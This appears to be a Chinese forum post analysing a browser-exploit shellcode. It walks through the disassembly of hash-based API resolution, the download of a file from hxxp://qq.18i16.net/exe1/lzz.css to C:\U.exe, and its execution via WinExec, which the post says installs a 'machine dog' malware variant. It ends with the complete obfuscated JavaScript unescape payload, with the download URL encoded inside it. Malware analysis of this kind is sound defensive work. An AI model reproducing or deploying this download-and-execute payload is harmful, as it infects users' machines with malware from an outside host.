从执行流程看shellcode(一)[附源代码]
1、shellcode初始化代码00401000 > $8D85 70FEFFFF lea eax, dword ptr ;shellcode初始化代码
00401006 .50 push eax ; /pWSAData
00401007 .68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
0040100C .FF15 18504000 call dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
2、获取函数的运算部分
00401020 .EB 54 jmp short 00401076 -------------------
00401022/$8B75 3C mov esi, dword ptr |
00401025|.8B7435 78 mov esi, dword ptr |
00401029|.03F5 add esi, ebp |
0040102B|.56 push esi |
0040102C|.8B76 20 mov esi, dword ptr
0040102F|.03F5 add esi, ebp
00401031|.33C9 xor ecx, ecx
00401033|.49 dec ecx
00401034|>41 /inc ecx
00401035|.AD |lods dword ptr 这部分就是获取函数的运算部分
00401036|.33DB |xor ebx, ebx
00401038|>36:0FBE1428 |/movsx edx, byte ptr ss:
0040103D|.38F2 ||cmp dl, dh
0040103F|.74 08 ||je short 00401049
00401041|.C1CB 0D ||ror ebx, 0D
00401044|.03DA ||add ebx, edx |
00401046|.40 ||inc eax |
00401047|.^ EB EF |\jmp short 00401038 |
00401049|>3BDF |cmp ebx, edi |
0040104B|.^ 75 E7 \jnz short 00401034 ----------------------------
3、shellcode运行的整个流程,最终通过hxxp://qq.18i16.net/exe1/lzz.css下载指定的病毒到用户计算机上执行,通过分析,下载
下来的为机器狗的最新变种,美其名曰“犇牛”。
00401090 .8B40 3C mov eax, dword ptr
00401093 >95 xchg eax, ebp ;交换
00401094 .BF 8E4E0EEC mov edi, EC0E4E8E ;EDI初始化
00401099 .E8 84FFFFFF call 00401022 ;获取到kernel32.LoadLibraryA
0040109E .83EC 04 sub esp, 4
004010A1 .832C24 3C sub dword ptr , 3C
004010A5 .FFD0 call eax ;执行加载urlmon.dll
004010A7 .95 xchg eax, ebp
004010A8 .50 push eax
004010A9 .BF 361A2F70 mov edi, 702F1A36
004010AE .E8 6FFFFFFF call 00401022 ;urlmon.URLDownloadToFileA
004010B3 .8B5424 FC mov edx, dword ptr
004010B7 .8D52 BA lea edx, dword ptr ;执行后保存到本地的文件路径和名称 C:\U.exe
004010BA .33DB xor ebx, ebx
004010BC .53 push ebx
004010BD .53 push ebx
004010BE .52 push edx ;C:\U.exe 压栈
004010BF .EB 24 jmp short 004010E5
004010C1 $53 push ebx
004010C2 .FFD0 call eax ;hxxp://qq.18i16.net/exe1/lzz.css执行下载
004010C4 .5D pop ebp
004010C5 .BF 98FE8A0E mov edi, 0E8AFE98 ;edi初始化
004010CA .E8 53FFFFFF call 00401022 ;获取到函数kernel32.WinExec
004010CF .83EC 04 sub esp, 4
004010D2 .832C24 62 sub dword ptr , 62
004010D6 .FFD0 call eax ;执行
004010D8 .BF 7ED8E273 mov edi, 73E2D87E
004010DD .E8 40FFFFFF call 00401022 ;获取到函数kernel32.ExitProcess
004010E2 .52 push edx
004010E3 .FFD0 call eax ; shellcode执行完毕退出
004010E5 >E8 D7FFFFFF call 004010C1 ; 获取到函数地址后开始执行动作
源代码:
var huoqiang=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%
u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%
u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%
uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%
u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%
u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%
uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%
u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%
u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%
u7074%u2f3a%u712f%u2e71%u3831%u3169%u2e36%u656e%u2f74%u7865"+"%u3165%u6c2f%u7a7a%u632e%u7373%u0000");
页:
[1]